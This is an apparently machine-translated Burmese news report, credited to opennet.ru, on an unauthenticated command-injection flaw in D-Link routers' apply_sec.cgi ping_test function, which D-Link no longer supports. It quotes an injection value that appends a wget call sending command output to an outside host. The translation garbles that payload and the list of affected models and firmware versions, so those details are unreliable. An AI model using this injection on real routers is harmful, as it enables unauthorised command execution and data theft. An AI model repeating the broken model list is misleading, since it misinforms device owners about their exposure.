D-Link ကြိုးမဲ့ရောက်တာများတွင်
စိတ်ဝင်စားစရာမှာ၊ firmware developer များအဆိုအရ၊ "ping_test" ခေါ်ဆိုမှုကို စစ်မှန်ကြောင်းအထောက်အထားပြပြီးမှသာ လုပ်ဆောင်သင့်သည်၊ သို့သော် လက်တွေ့တွင် ဝဘ်အင်တာဖေ့စ်သို့ဝင်ရောက်ခြင်းမပါဝင်ဘဲ မည်သည့်ကိစ္စတွင်မဆို ၎င်းကို ခေါ်ဆိုခြင်းဖြစ်သည်။ အထူးသဖြင့်၊ apply_sec.cgi script ကိုဝင်ရောက်ပြီး “action=ping_test” ကန့်သတ်ဘောင်ကိုဖြတ်သောအခါ၊ script သည် authentication page သို့ပြန်ညွှန်းသည်၊ သို့သော်တစ်ချိန်တည်းတွင် ping_test နှင့်ဆက်စပ်သောလုပ်ဆောင်ချက်ကိုလုပ်ဆောင်သည်။ ကုဒ်ကိုလုပ်ဆောင်ရန်၊ စမ်းသပ်ရန်အတွက်ပေးပို့သော IP လိပ်စာ၏မှန်ကန်မှုကို ကောင်းစွာမစစ်ဆေးဘဲ ping_test ကိုယ်တိုင်ခေါ်သည့် အခြားအားနည်းချက်တစ်ခုကို ping_test ကိုယ်တိုင်အသုံးပြုခဲ့သည်။ ဥပမာအားဖြင့်၊ wget utility ကိုခေါ်ဆိုပြီး “echo 1234” ညွှန်ကြားချက်၏ရလဒ်များကို ပြင်ပ host တစ်ခုသို့ လွှဲပြောင်းရန်၊ “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// ကန့်သတ်ဘောင်ကို သတ်မှတ်ပါ။ test.test/?$(ပဲ့တင်သံ 1234)"။
အားနည်းချက်ရှိနေခြင်းကို အောက်ပါပုံစံများတွင် တရားဝင်အတည်ပြုထားသည်။
- firmware 655b3.02 နှင့်အထက် DIR-05;
- ဖိုင်းဝဲ 866b1.03 သို့မဟုတ် အထက်ရှိသော DIR-04L၊
- Firmware 1565 နှင့်အထက်ရှိသော DIR-1.01
- DIR-652 (ပြဿနာရှိသော firmware ဗားရှင်းများအကြောင်း အချက်အလက်များ ပေးမထားပါ)
ဤမော်ဒယ်များအတွက် ပံ့ပိုးမှုကာလသည် သက်တမ်းကုန်ဆုံးသွားပြီဖြစ်သောကြောင့် D-Link
နောက်ပိုင်းတွင် အားနည်းချက်လည်း ရှိနေကြောင်း တွေ့ရှိခဲ့သည်။
source: opennet.ru